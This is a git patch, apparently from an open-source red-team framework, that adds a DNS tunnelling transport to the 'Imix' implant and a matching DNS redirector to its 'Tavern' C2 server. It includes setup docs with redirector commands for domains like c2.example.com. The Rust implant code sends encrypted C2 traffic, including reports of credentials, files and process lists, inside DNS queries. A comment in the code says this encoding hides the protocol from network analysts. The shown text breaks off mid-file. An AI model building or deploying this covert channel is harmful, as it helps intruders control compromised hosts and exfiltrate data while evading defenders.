From b124671b5e86b721a6e57a1d43b83ef668f36feb Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Fri, 28 Nov 2025 00:39:17 -0600 Subject: [PATCH 01/17] =?UTF-8?q?DNS=20transport=20=F0=9F=94=A5?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- docs/_docs/admin-guide/tavern.md | 62 +- docs/_docs/dev-guide/imix.md | 126 ++- docs/_docs/user-guide/imix.md | 37 +- implants/imix/Cargo.toml | 1 + implants/lib/transport/Cargo.toml | 3 + implants/lib/transport/src/dns.rs | 1410 ++++++++++++++++++++++++ implants/lib/transport/src/lib.rs | 11 + tavern/app.go | 1 + tavern/internal/redirectors/dns/dns.go | 1047 ++++++++++++++++++ 9 files changed, 2662 insertions(+), 36 deletions(-) create mode 100644 implants/lib/transport/src/dns.rs create mode 100644 tavern/internal/redirectors/dns/dns.go diff --git a/docs/_docs/admin-guide/tavern.md b/docs/_docs/admin-guide/tavern.md index 66f4d99c9..a924b87ce 100644 --- a/docs/_docs/admin-guide/tavern.md +++ b/docs/_docs/admin-guide/tavern.md @@ -104,7 +104,67 @@ Below are some deployment gotchas and notes that we try to address with Terrafor ## Redirectors -By default Tavern only supports GRPC connections directly to the server. To Enable additional protocols or additional IPs / Domain names in your callbacks utilize tavern redirectors which recieve traffic using a specific protocol like HTTP/1.1 and then forward it to an upstream tavern server over GRPC. See: `tavern redirector -help` +By default Tavern only supports gRPC connections directly to the server. To enable additional protocols or additional IPs/domain names in your callbacks, utilize Tavern redirectors which receive traffic using a specific protocol (like HTTP/1.1 or DNS) and then forward it to an upstream Tavern server over gRPC. 
+ +### Available Redirectors + +Realm includes three built-in redirector implementations: + +- **`grpc`** - Direct gRPC passthrough redirector +- **`http1`** - HTTP/1.1 to gRPC redirector +- **`dns`** - DNS to gRPC redirector + +### Basic Usage + +List available redirectors: + +```bash +tavern redirector list +``` + +Start a redirector: + +```bash +tavern redirector --transport <transport> --listen <address> <upstream> +``` + +### HTTP/1.1 Redirector + +The HTTP/1.1 redirector accepts HTTP/1.1 traffic from agents and forwards it to an upstream gRPC server. + +```bash +# Start HTTP/1.1 redirector on port 8080 +tavern redirector --transport http1 --listen ":8080" localhost:8000 +``` + +### DNS Redirector + +The DNS redirector tunnels C2 traffic through DNS queries and responses, providing a covert communication channel. It supports TXT, A, and AAAA record types. + +```bash +# Start DNS redirector on UDP port 53 for domain c2.example.com +tavern redirector --transport dns --listen "0.0.0.0:53?domain=c2.example.com" localhost:8000 + +# Support multiple domains +tavern redirector --transport dns --listen "0.0.0.0:53?domain=c2.example.com&domain=backup.example.com" localhost:8000 +``` + +**DNS Configuration Requirements:** + +1. Configure your DNS server to delegate queries for your C2 domain to the redirector IP +2. Or run the redirector as your authoritative DNS server for the domain +3. Ensure UDP port 53 is accessible + +See the [DNS Transport Configuration](/user-guide/imix#dns-transport-configuration) section in the Imix user guide for more details on agent-side configuration. + +### gRPC Redirector + +The gRPC redirector provides a passthrough for gRPC traffic, useful for deploying multiple Tavern endpoints or load balancing. 
+ +```bash +# Start gRPC redirector on port 9000 +tavern redirector --transport grpc --listen ":9000" localhost:8000 +``` ## Configuration diff --git a/docs/_docs/dev-guide/imix.md b/docs/_docs/dev-guide/imix.md index 65fed4035..bea5aa0a4 100644 --- a/docs/_docs/dev-guide/imix.md +++ b/docs/_docs/dev-guide/imix.md @@ -91,29 +91,45 @@ pub use mac_address::MacAddress; ## Develop a New Transport -We've tried to make Imix super extensible for transport development. In fact, all of the transport specific logic is complete abstracted from how Imix operates for callbacks/tome excution. For Imix all Transports live in the `realm/implants/lib/transport/src` directory. +We've tried to make Imix super extensible for transport development. In fact, all of the transport specific logic is completely abstracted from how Imix operates for callbacks/tome execution. For Imix all Transports live in the `realm/implants/lib/transport/src` directory. -If creating a new Transport create a new file in the directory and name it after the protocol you plan to use. For example, if writing a DNS Transport then call your file `dns.rs`. Then define your public struct where any connection state/clients will be. For example, +### Current Available Transports + +Realm currently includes three transport implementations: + +- **`grpc`** - Default gRPC transport (with optional DoH support via `grpc-doh` feature) +- **`http1`** - HTTP/1.1 transport +- **`dns`** - DNS-based covert channel transport + +**Note:** Only one transport may be selected at compile time. The build will fail if multiple transport features are enabled simultaneously. + +### Creating a New Transport + +If creating a new Transport, create a new file in the `realm/implants/lib/transport/src` directory and name it after the protocol you plan to use. For example, if writing a new protocol called "Custom" then call your file `custom.rs`. Then define your public struct where any connection state/clients will be stored. 
For example, ```rust #[derive(Debug, Clone)] -pub struct DNS { - dns_client: Option +pub struct Custom { + // Your connection state here + // e.g., client: Option } ``` -NOTE: Depending on the struct you build, you may need to derive certain features, see above we derive `Debug` and `Clone`. +**NOTE:** Your struct **must** derive `Clone` and `Send` as these are required by the Transport trait. Deriving `Debug` is also recommended for troubleshooting. Next, we need to implement the Transport trait for our new struct. This will look like: ```rust -impl Transport for DNS { +impl Transport for Custom { fn init() -> Self { - DNS{ dns_client: None } + Custom { + // Initialize your connection state here + // e.g., client: None + } } fn new(callback: String, proxy_uri: Option) -> Result { // TODO: setup connection/client hook in proxy, anything else needed - // before fuctions get called. + // before functions get called. Err(anyhow!("Unimplemented!")) } async fn claim_tasks(&mut self, request: ClaimTasksRequest) -> Result { @@ -169,20 +185,35 @@ impl Transport for DNS { NOTE: Be Aware that currently `reverse_shell` uses tokio's sender/reciever while the rest of the methods rely on mpsc's. This is an artifact of some implementation details under the hood of Imix. Some day we may wish to move completely over to tokio's but currenlty it would just result in performance loss/less maintainable code. -After you implement all the functions/write in a decent error message for operators to understad why the function call failed then you need to import the Transport to the broader lib scope. To do this open up `realm/implants/lib/transport/src/lib.rs` and add in your new Transport like so: +After you implement all the functions and write descriptive error messages for operators to understand why function calls failed, you need to: -```rust -// more stuff above +#### 1. 
Add Compile-Time Exclusivity Checks -#[cfg(feature = "dns")] -mod dns; -#[cfg(feature = "dns")] -pub use dns::DNS; +In `realm/implants/lib/transport/src/lib.rs`, add compile-time checks to ensure your new transport cannot be compiled alongside others: -// more stuff below +```rust +// Add your transport to the mutual exclusivity checks +#[cfg(all(feature = "grpc", feature = "custom"))] +compile_error!("only one transport may be selected"); +#[cfg(all(feature = "http1", feature = "custom"))] +compile_error!("only one transport may be selected"); +#[cfg(all(feature = "dns", feature = "custom"))] +compile_error!("only one transport may be selected"); + +// ... existing checks above ... + +// Add your transport module and export +#[cfg(feature = "custom")] +mod custom; +#[cfg(feature = "custom")] +pub use custom::Custom as ActiveTransport; ``` -Also add your new feature to the Transport Cargo.toml at `realm/implants/lib/transport/Cargo.toml`. +**Important:** The transport is exported as `ActiveTransport`, not by its type name. This allows the imix agent code to remain transport-agnostic. + +#### 2. Update Transport Library Dependencies + +Add your new feature and any required dependencies to `realm/implants/lib/transport/Cargo.toml`: ```toml # more stuff above @@ -190,38 +221,65 @@ Also add your new feature to the Transport Cargo.toml at `realm/implants/lib/tra [features] default = [] grpc = [] -dns = [] # <-- see here +grpc-doh = ["grpc", "dep:hickory-resolver"] +http1 = [] +dns = ["dep:data-encoding", "dep:rand"] +custom = ["dep:your-custom-dependency"] # <-- Add your feature here mock = ["dep:mockall"] +[dependencies] +# ... existing dependencies ... + +# Add any dependencies needed by your transport +your-custom-dependency = { version = "1.0", optional = true } + # more stuff below ``` -And that's it! Well, unless you want to _use_ the new transport. 
In which case you need to swap out the chosen transport being compiled for Imix in it's Cargo.toml (`/workspaces/realm/implants/lib/transport/Cargo.toml`) like so +#### 3. Enable Your Transport in Imix + +To use your new transport, update the imix Cargo.toml at `realm/implants/imix/Cargo.toml`: ```toml # more stuff above -[dependencies] -eldritch = { workspace = true, features = ["imix"] } -pb = { workspace = true } -transport = { workspace = true, features = ["dns"] } # <-- see here -host_unique = { workspace = true } +[features] +# Check if compiled by imix +win_service = [] +default = ["transport/grpc"] # Default transport +http1 = ["transport/http1"] +dns = ["transport/dns"] +custom = ["transport/custom"] # <-- Add your feature here +transport-grpc-doh = ["transport/grpc-doh"] # more stuff below ``` -Then just swap which Transport gets intialized on Imix's `run` function in run.rs (`/workspaces/realm/implants/imix/src/run.rs`) accordingly, +#### 4. Build Imix with Your Transport -```rust -// more stuff above +Compile imix with your custom transport: -async fn run(cfg: Config) -> anyhow::Result<()> { - let mut agent = Agent::new(cfg, DNS::init())?; // <-- changed this (also imported it) - agent.callback_loop().await?; - Ok(()) -} +```bash +# From the repository root +cd implants/imix -// more stuff below +# Build with your transport feature +cargo build --release --features custom --no-default-features + +# Or for the default transport (grpc) +cargo build --release ``` -And that's all that is needed for Imix to use a new Transport! Now all there is to do is setup some sort of tavern proxy for your new protocol and test! +**Important:** Only specify one transport feature at a time. The build will fail if multiple transport features are enabled. Ensure you include `--no-default-features` when building with a non-default transport. + +#### 5. 
Set Up the Corresponding Redirector + +For your agent to communicate, you'll need to implement a corresponding redirector in Tavern. See the redirector implementations in `tavern/internal/redirectors/` for examples: + +- `tavern/internal/redirectors/grpc/` - gRPC redirector +- `tavern/internal/redirectors/http1/` - HTTP/1.1 redirector +- `tavern/internal/redirectors/dns/` - DNS redirector + +Your redirector must implement the `Redirector` interface and register itself in the redirector registry. See `tavern/internal/redirectors/redirector.go` for the interface definition. + +And that's all that is needed for Imix to use a new Transport! The agent code automatically uses whichever transport is enabled at compile time via the `ActiveTransport` type alias. diff --git a/docs/_docs/user-guide/imix.md b/docs/_docs/user-guide/imix.md index b261645e2..f01d6e67a 100644 --- a/docs/_docs/user-guide/imix.md +++ b/docs/_docs/user-guide/imix.md @@ -15,7 +15,7 @@ Imix has compile-time configuration, that may be specified using environment var | Env Var | Description | Default | Required | | ------- | ----------- | ------- | -------- | -| IMIX_CALLBACK_URI | URI for initial callbacks (must specify a scheme, e.g. `http://`) | `http://127.0.0.1:8000` | No | +| IMIX_CALLBACK_URI | URI for initial callbacks (must specify a scheme, e.g. `http://` or `dns://`) | `http://127.0.0.1:8000` | No | | IMIX_SERVER_PUBKEY | The public key for the tavern server (obtain from server using `curl $IMIX_CALLBACK_URI/status`). | - | Yes | | IMIX_CALLBACK_INTERVAL | Duration between callbacks, in seconds. | `5` | No | | IMIX_RETRY_INTERVAL | Duration to wait before restarting the agent loop if an error occurs, in seconds. | `5` | No | @@ -30,6 +30,8 @@ Imix has run-time configuration, that may be specified using environment variabl | IMIX_BEACON_ID | The identifier to be used during callback (must be globally unique) | Random UUIDv4 | No | | IMIX_LOG | Log message level for debug builds. 
See below for more information. | INFO | No | + + ## Logging At runtime, you may use the `IMIX_LOG` environment variable to control log levels and verbosity. See [these docs](https://docs.rs/pretty_env_logger/latest/pretty_env_logger/) for more information. **When building a release version of imix, logging is disabled** and is not included in the released binary. @@ -97,6 +99,7 @@ These flags are passed to cargo build Eg.: - `--features grpc-doh` - Enable DNS over HTTP using cloudflare DNS for the grpc transport - `--features http1 --no-default-features` - Changes the default grpc transport to use HTTP/1.1. Requires running the http redirector. +- `--features dns --no-default-features` - Changes the default grpc transport to use DNS. Requires running the dns redirector. See the [DNS Transport Configuration](#dns-transport-configuration) section for more information on how to configure the DNS transport URI. ### Linux @@ -171,3 +174,35 @@ cargo build --release --features win_service --target=x86_64-pc-windows-gnu # Build imix.dll cargo build --release --lib --target=x86_64-pc-windows-gnu ``` + + +## DNS Transport Configuration + +The DNS transport enables covert C2 communication by tunneling traffic through DNS queries and responses. This transport supports multiple DNS record types (TXT, A, AAAA) and can use either a specific DNS server or the system's default resolver. 
+ +### DNS URI Format + +When using the DNS transport, configure `IMIX_CALLBACK_URI` with the following format: + +``` +dns://<dns-server>/<base-domain>[?type=<record-type>&fallback=<true|false>] +``` + +**Parameters:** +- `<dns-server>` - DNS server IP address, or `*` to use system resolver (recommended) +- `<base-domain>` - Base domain for DNS queries (e.g., `c2.example.com` will result in queries like `abcd1234.c2.example.com`) +- `type` (optional) - Preferred DNS record type: `TXT` (default), `A`, or `AAAA` +- `fallback` (optional) - Enable automatic fallback to other record types on failure (default: `true`) + +**Examples:** + +```bash +# Use specific DNS server (8.8.8.8) with TXT records and fallback enabled +export IMIX_CALLBACK_URI="dns://8.8.8.8/c2.example.com" + +# Use system resolver, prefer A records only +export IMIX_CALLBACK_URI="dns://*/c2.example.com?type=A" + +# Use system resolver with AAAA records and no fallback +export IMIX_CALLBACK_URI="dns://*/c2.example.com?type=AAAA&fallback=false" +``` diff --git a/implants/imix/Cargo.toml b/implants/imix/Cargo.toml index 844344d8f..5c1c55b08 100644 --- a/implants/imix/Cargo.toml +++ b/implants/imix/Cargo.toml @@ -11,6 +11,7 @@ crate-type = ["cdylib"] win_service = [] default = ["transport/grpc"] http1 = ["transport/http1"] +dns = ["transport/dns"] transport-grpc-doh = ["transport/grpc-doh"] [dependencies] diff --git a/implants/lib/transport/Cargo.toml b/implants/lib/transport/Cargo.toml index 29885ad59..266e6305c 100644 --- a/implants/lib/transport/Cargo.toml +++ b/implants/lib/transport/Cargo.toml @@ -8,6 +8,7 @@ default = [] grpc = [] grpc-doh = ["grpc", "dep:hickory-resolver"] http1 = [] +dns = ["dep:data-encoding", "dep:rand"] mock = ["dep:mockall"] [dependencies] @@ -27,6 +28,8 @@ hyper = { version = "0.14", features = [ ] } # Had to user an older version of hyper to support hyper-proxy hyper-proxy = {version = "0.9.1", default-features = false, features = ["rustls"]} hickory-resolver = { version = "0.24", features = ["dns-over-https-rustls", "webpki-roots"], optional = 
true } +data-encoding = { version = "2.9.0", optional = true } +rand = { workspace = true, optional = true } # [feature = mock] mockall = { workspace = true, optional = true } diff --git a/implants/lib/transport/src/dns.rs b/implants/lib/transport/src/dns.rs new file mode 100644 index 000000000..12cd3570f --- /dev/null +++ b/implants/lib/transport/src/dns.rs @@ -0,0 +1,1410 @@ +use anyhow::{Context, Result}; +use pb::c2::*; +use prost::Message; +use std::sync::mpsc::{Receiver, Sender}; +use tokio::net::UdpSocket; + +use crate::Transport; + +// DNS protocol limits +const DNS_HEADER_SIZE: usize = 12; // Standard DNS header size +const MAX_LABEL_LENGTH: usize = 63; // Maximum bytes in a DNS label +const TXT_RECORD_TYPE: u16 = 16; // TXT record QTYPE +const A_RECORD_TYPE: u16 = 1; // A record QTYPE +const AAAA_RECORD_TYPE: u16 = 28; // AAAA record QTYPE +const DNS_CLASS_IN: u16 = 1; // Internet class + +// Record type fallback priority (TXT has highest capacity) +const RECORD_TYPE_PRIORITY: &[u16] = &[TXT_RECORD_TYPE, AAAA_RECORD_TYPE, A_RECORD_TYPE]; + +// Protocol field sizes (base36 encoding) +const TYPE_SIZE: usize = 1; // Packet type: i/d/e/f +const SEQ_SIZE: usize = 5; // Sequence: 36^5 = 60,466,176 max chunks +const CONV_ID_SIZE: usize = 12; // Conversation ID length +const HEADER_SIZE: usize = TYPE_SIZE + SEQ_SIZE + CONV_ID_SIZE; +const MAX_DNS_NAME_LEN: usize = 253; // DNS max total domain name length + +// Packet types +const TYPE_INIT: char = 'i'; // Init: establish conversation +const TYPE_DATA: char = 'd'; // Data: send chunk +const TYPE_END: char = 'e'; // End: finalize and process +const TYPE_FETCH: char = 'f'; // Fetch: retrieve response chunk + +// Response prefixes (TXT records) +const RESP_OK: &str = "ok:"; // Success with data +const RESP_MISSING: &str = "m:"; // Missing chunks list +const RESP_ERROR: &str = "e:"; // Error message +const RESP_CHUNKED: &str = "r:"; // Response chunked metadata + +// Retry configuration +const MAX_RETRIES: usize = 5; 
+const INIT_TIMEOUT_SECS: u64 = 15; +const CHUNK_TIMEOUT_SECS: u64 = 20; +const EXCHANGE_MAX_RETRIES: usize = 5; +const EXCHANGE_RETRY_DELAY_SECS: u64 = 3; + +// gRPC method paths +static CLAIM_TASKS_PATH: &str = "/c2.C2/ClaimTasks"; +static FETCH_ASSET_PATH: &str = "/c2.C2/FetchAsset"; +static REPORT_CREDENTIAL_PATH: &str = "/c2.C2/ReportCredential"; +static REPORT_FILE_PATH: &str = "/c2.C2/ReportFile"; +static REPORT_PROCESS_LIST_PATH: &str = "/c2.C2/ReportProcessList"; +static REPORT_TASK_OUTPUT_PATH: &str = "/c2.C2/ReportTaskOutput"; + +fn marshal_with_codec<Req, Resp>(msg: Req) -> Result<Vec<u8>> +where + Req: Message + Send + 'static, + Resp: Message + Default + Send + 'static, +{ + pb::xchacha::encode_with_chacha::<Req, Resp>(msg) +} + +fn unmarshal_with_codec<Req, Resp>(data: &[u8]) -> Result<Resp> +where + Req: Message + Send + 'static, + Resp: Message + Default + Send + 'static, +{ + pb::xchacha::decode_with_chacha::<Req, Resp>(data) +} + +/// Map gRPC method path to 2-character code +/// Codes: ct=ClaimTasks, fa=FetchAsset, rc=ReportCredential, +/// rf=ReportFile, rp=ReportProcessList, rt=ReportTaskOutput +fn method_to_code(method: &str) -> String { + match method { + "/c2.C2/ClaimTasks" => "ct".to_string(), + "/c2.C2/FetchAsset" => "fa".to_string(), + "/c2.C2/ReportCredential" => "rc".to_string(), + "/c2.C2/ReportFile" => "rf".to_string(), + "/c2.C2/ReportProcessList" => "rp".to_string(), + "/c2.C2/ReportTaskOutput" => "rt".to_string(), + _ => "ct".to_string(), + } +} + +/// DNS transport implementation +/// +/// Tunnels C2 traffic through DNS queries and responses using a +/// conversation-based protocol with init, data, end, and fetch packets. +/// Supports TXT, A, and AAAA record types with automatic fallback. 
+#[derive(Debug, Clone)] +pub struct DNS { + dns_server: Option<String>, // None = use system resolver + base_domain: String, + socket: Option<std::sync::Arc<UdpSocket>>, // NOTE(review): generic args lost in extraction; Arc<UdpSocket> inferred from Clone derive + shared async use — confirm upstream + preferred_record_type: u16, // User's preferred type (TXT/A/AAAA) + current_record_type: u16, // Current type (may change after fallback) + enable_fallback: bool, // Whether to try other types on failure +} + +impl DNS { + /// Calculate maximum data size per chunk + /// After base32-encoding entire packet [type:1][seq:5][convid:12][data...] + /// Base32 expands by 8/5 = 1.6x, so work backwards from DNS name limit + fn calculate_max_data_size(&self) -> usize { + let base_with_dot = self.base_domain.len() + 1; + let total_available = MAX_DNS_NAME_LEN.saturating_sub(base_with_dot); + + // Base32 encoding: ((HEADER_SIZE + data) * 8 / 5) <= total_available + // Solve for data: data <= (total_available * 5 / 8) - HEADER_SIZE + let max_raw_packet = (total_available * 5) / 8; + max_raw_packet.saturating_sub(HEADER_SIZE) + } + + /// Generate a random conversation ID + fn generate_conv_id() -> String { + use rand::Rng; + let mut rng = rand::thread_rng(); + let bytes: [u8; 8] = rng.gen(); + Self::encode_base32(&bytes)[..CONV_ID_SIZE].to_string() + } + + fn encode_seq(seq: usize) -> String { + const BASE36: &[u8] = b"0123456789abcdefghijklmnopqrstuvwxyz"; + let digit4 = (seq / 1679616) % 36; // 36^4 + let digit3 = (seq / 46656) % 36; // 36^3 + let digit2 = (seq / 1296) % 36; // 36^2 + let digit1 = (seq / 36) % 36; // 36^1 + let digit0 = seq % 36; // 36^0 + format!( + "{}{}{}{}{}", + BASE36[digit4] as char, + BASE36[digit3] as char, + BASE36[digit2] as char, + BASE36[digit1] as char, + BASE36[digit0] as char + ) + } + + fn decode_seq(encoded: &str) -> Result<usize> { + let chars: Vec<char> = encoded.chars().collect(); + if chars.len() != 5 { + return Err(anyhow::anyhow!( + "Invalid sequence length: expected 5, got {}", + chars.len() + )); + } + + let val = |c: char| -> Result<usize> { + match c { + '0'..='9' => Ok((c as usize) - ('0' as usize)), + 'a'..='z' => 
Ok((c as usize) - ('a' as usize) + 10), + _ => Err(anyhow::anyhow!("Invalid base36 character")), + } + }; + + Ok(val(chars[0])? * 1679616 + + val(chars[1])? * 46656 + + val(chars[2])? * 1296 + + val(chars[3])? * 36 + + val(chars[4])?) + } + + /// Calculate CRC16-CCITT checksum (polynomial 0x1021, init 0xFFFF) + fn calculate_crc16(data: &[u8]) -> u16 { + let mut crc: u16 = 0xFFFF; + for byte in data { + crc ^= (*byte as u16) << 8; + for _ in 0..8 { + if (crc & 0x8000) != 0 { + crc = (crc << 1) ^ 0x1021; + } else { + crc <<= 1; + } + } + } + crc + } + + /// Encode CRC16 to 4-digit base36 (for init payload and response metadata only) + fn encode_base36_crc(crc: u16) -> String { + const BASE36: &[u8] = b"0123456789abcdefghijklmnopqrstuvwxyz"; + let crc_val = crc as usize; + let digit3 = (crc_val / 46656) % 36; // 36^3 + let digit2 = (crc_val / 1296) % 36; // 36^2 + let digit1 = (crc_val / 36) % 36; // 36^1 + let digit0 = crc_val % 36; // 36^0 + format!( + "{}{}{}{}", + BASE36[digit3] as char, + BASE36[digit2] as char, + BASE36[digit1] as char, + BASE36[digit0] as char + ) + } + + /// Decode 4-digit base36 CRC + fn decode_base36_crc(encoded: &str) -> Result<u16> { + let chars: Vec<char> = encoded.chars().collect(); + if chars.len() != 4 { + return Err(anyhow::anyhow!( + "Invalid CRC length: expected 4, got {}", + chars.len() + )); + } + + let val = |c: char| -> Result<usize> { + match c { + '0'..='9' => Ok((c as usize) - ('0' as usize)), + 'a'..='z' => Ok((c as usize) - ('a' as usize) + 10), + _ => Err(anyhow::anyhow!("Invalid base36 character in CRC")), + } + }; + + let crc = + val(chars[0])? * 46656 + val(chars[1])? * 1296 + val(chars[2])? 
* 36 + val(chars[3])?; + Ok(crc as u16) + } + + /// Encode data to lowercase base32 without padding + fn encode_base32(data: &[u8]) -> String { + use data_encoding::BASE32_NOPAD; + BASE32_NOPAD.encode(data).to_lowercase() + } + + /// Decode lowercase base32 data without padding + fn decode_base32(encoded: &str) -> Result<Vec<u8>> { + use data_encoding::BASE32_NOPAD; + BASE32_NOPAD + .decode(encoded.to_uppercase().as_bytes()) + .context("Failed to decode base32") + } + + /// Build packet subdomain with opaque base32 encoding + /// Entire packet structure is base32-encoded: [type:1][seq:5][convid:12][raw_data_bytes...] + /// This hides the protocol structure from network analysts + fn build_packet( + &self, + pkt_type: char, + seq: usize, + conv_id: &str, + raw_data: &[u8], + ) -> Result<String> { + let max_data_size = self.calculate_max_data_size(); + + let truncated_data = if raw_data.len() > max_data_size { + &raw_data[..max_data_size] + } else { + raw_data + }; + + // Build raw packet: [type:1][seq:5][convid:12][raw_bytes...] 
+ let mut packet = Vec::new(); + packet.push(pkt_type as u8); + packet.extend_from_slice(Self::encode_seq(seq).as_bytes()); + packet.extend_from_slice(conv_id.as_bytes()); + packet.extend_from_slice(truncated_data); + + // Base32-encode entire packet (makes it opaque) + let encoded_packet = Self::encode_base32(&packet); + + // Split into DNS labels (63 chars each) + let mut labels = Vec::new(); + for chunk in encoded_packet.as_bytes().chunks(MAX_LABEL_LENGTH) { + labels.push(String::from_utf8_lossy(chunk).to_string()); + } + + Ok(labels.join(".")) + } + + /// Build init packet with plaintext payload + /// Format (before base32): [i][00000][conv_id][method_code:2][total_chunks:5][crc:4] + fn build_init_packet(conv_id: &str, plaintext_payload: &str) -> Result<String> { + // Build raw packet + let mut packet = Vec::new(); + packet.push(TYPE_INIT as u8); + packet.extend_from_slice(Self::encode_seq(0).as_bytes()); + packet.extend_from_slice(conv_id.as_bytes()); + packet.extend_from_slice(plaintext_payload.as_bytes()); + + // Base32-encode entire packet + let encoded_packet = Self::encode_base32(&packet); + + // Split into DNS labels + let mut labels = Vec::new(); + for chunk in encoded_packet.as_bytes().chunks(MAX_LABEL_LENGTH) { + labels.push(String::from_utf8_lossy(chunk).to_string()); + } + + Ok(labels.join(".")) + } + + /// Build a DNS query for the specified record type + fn build_dns_query(&self, subdomain: &str, transaction_id: u16, record_type: u16) -> Vec<u8> { + let mut query = Vec::new(); + + // DNS Header (12 bytes) + query.extend_from_slice(&transaction_id.to_be_bytes()); // Transaction ID + query.extend_from_slice(&[0x01, 0x00]); // Flags: Standard query + query.extend_from_slice(&[0x00, 0x01]); // Questions: 1 + query.extend_from_slice(&[0x00, 0x00]); // Answer RRs: 0 + query.extend_from_slice(&[0x00, 0x00]); // Authority RRs: 0 + query.extend_from_slice(&[0x00, 0x00]); // Additional RRs: 0 + + // Question section + let fqdn = format!("{}.{}", subdomain, 
self.base_domain); + for label in fqdn.split('.') { + if label.is_empty() { + continue; + } + query.push(label.len() as u8); + query.extend_from_slice(label.as_bytes()); + } + query.push(0x00); // End of domain name + + query.extend_from_slice(&record_type.to_be_bytes()); // Type: TXT/A/AAAA + query.extend_from_slice(&DNS_CLASS_IN.to_be_bytes()); // Class: IN + + query + } + + /// Parse a DNS response and extract record data (TXT, A, or AAAA) + fn parse_dns_response(&self, response: &[u8]) -> Result<Vec<u8>> { + if response.len() < DNS_HEADER_SIZE { + return Err(anyhow::anyhow!("Response too short")); + } + + // Parse header + let answer_count = u16::from_be_bytes([response[6], response[7]]); + if answer_count == 0 { + return Ok(Vec::new()); // Empty response + } + + // Skip question section + let mut offset = DNS_HEADER_SIZE; + + // Parse domain name in question + while offset < response.len() && response[offset] != 0 { + let len = response[offset] as usize; + if len == 0 || offset + len >= response.len() { + break; + } + offset += 1 + len; + } + offset += 1; // Skip null terminator + offset += 4; // Skip QTYPE and QCLASS + + // Parse answer section + let mut record_data = Vec::new(); + + for _ in 0..answer_count { + if offset + 12 > response.len() { + break; + } + + // Skip name (with compression support) + while offset < response.len() { + let b = response[offset]; + if b == 0 { + offset += 1; + break; + } else if (b & 0xC0) == 0xC0 { + // Pointer + offset += 2; + break; + } else { + offset += 1 + (b as usize); + } + } + + if offset + 10 > response.len() { + break; + } + + let rtype = u16::from_be_bytes([response[offset], response[offset + 1]]); + offset += 8; // Skip TYPE, CLASS, TTL + let rdlength = u16::from_be_bytes([response[offset], response[offset + 1]]); + offset += 2; + + if rtype == TXT_RECORD_TYPE { + // TXT record - extract text data + let rdata_end = offset + rdlength as usize; + while offset < rdata_end && offset < response.len() { + let txt_len = 
response[offset] as usize; + offset += 1; + if offset + txt_len <= response.len() && offset + txt_len <= rdata_end { + record_data.extend_from_slice(&response[offset..offset + txt_len]); + offset += txt_len; + } else { + break; + } + } + } else if rtype == A_RECORD_TYPE || rtype == AAAA_RECORD_TYPE { + // A or AAAA record - extract IP address bytes + if offset + rdlength as usize <= response.len() { + record_data.extend_from_slice(&response[offset..offset + rdlength as usize]); + offset += rdlength as usize; + } + } else { + offset += rdlength as usize; + } + } + + Ok(record_data) + } + + /// Send a single DNS query and receive response, with record type fallback + async fn send_query(&mut self, subdomain: &str) -> Result<Vec<u8>> { + use rand::Rng; + + let socket = self + .socket + .as_ref() + .ok_or_else(|| anyhow::anyhow!("Socket not initialized"))?; + + // Determine which record types to try + let record_types_to_try: Vec<u16> = if self.enable_fallback { + // Try all record types in priority order, but start with preferred + let mut types = Vec::new(); + types.push(self.preferred_record_type); + for &rt in RECORD_TYPE_PRIORITY { + if rt != self.preferred_record_type { + types.push(rt); + } + } + types + } else { + // Only try the preferred record type + vec![self.preferred_record_type] + }; + + // Try each record type + for &record_type in &record_types_to_try { + #[cfg(debug_assertions)] + { + let type_name = match record_type { + TXT_RECORD_TYPE => "TXT", + A_RECORD_TYPE => "A", + AAAA_RECORD_TYPE => "AAAA", + _ => "UNKNOWN", + }; + log::trace!("Attempting DNS query with record type: {}", type_name); + } + + // Generate random transaction ID + let transaction_id: u16 = rand::thread_rng().gen(); + let query = self.build_dns_query(subdomain, transaction_id, record_type); + + // Determine DNS server to use + let target = if let Some(ref server) = self.dns_server { + server.clone() + } else { + // Use system resolver - send to localhost:53 + "127.0.0.1:53".to_string() + }; + 
+ // Send query + match socket.send_to(&query, &target).await { + Ok(_) => {} + Err(e) => { + #[cfg(debug_assertions)] + log::trace!("Failed to send query: {}", e); + continue; // Try next record type + } + } + + // Receive response(s) until we get one with matching transaction ID + let deadline = tokio::time::Instant::now() + tokio::time::Duration::from_secs(5); + let mut buf = [0u8; 4096]; + + loop { + let remaining = deadline.saturating_duration_since(tokio::time::Instant::now()); + if remaining.is_zero() { + // Timeout - try next record type + break; + } + + match tokio::time::timeout(remaining, socket.recv_from(&mut buf)).await { + Ok(Ok((len, _))) => { + // Check if transaction ID matches + if len >= 2 { + let response_id = u16::from_be_bytes([buf[0], buf[1]]); + if response_id == transaction_id { + // Check for DNS error (RCODE in flags) + if len >= 4 { + let rcode = buf[3] & 0x0F; // Last 4 bits of flags + if rcode != 0 { + // DNS error response - try next record type + #[cfg(debug_assertions)] + log::trace!("DNS error response, RCODE={}", rcode); + break; + } + } + + // Matching response found + match self.parse_dns_response(&buf[..len]) { + Ok(data) => { + // Accept both empty and non-empty responses + // (data packets return empty ACK, others return data) + self.current_record_type = record_type; + return Ok(data); + } + Err(_) => { + break; + } + } + } + // Wrong transaction ID - keep waiting for the right one + #[cfg(debug_assertions)] + log::trace!("Ignoring DNS response with mismatched transaction ID: expected {}, got {}", transaction_id, response_id); + } + } + Ok(Err(e)) => { + #[cfg(debug_assertions)] + log::trace!("Failed to receive response: {}", e); + break; // Try next record type + } + Err(_) => { + // Timeout - try next record type + break; + } + } + } + } + + // All record types failed + Err(anyhow::anyhow!("All DNS record types failed")) + } + + /// Send init packet and receive conversation ID from server + /// Init payload: 
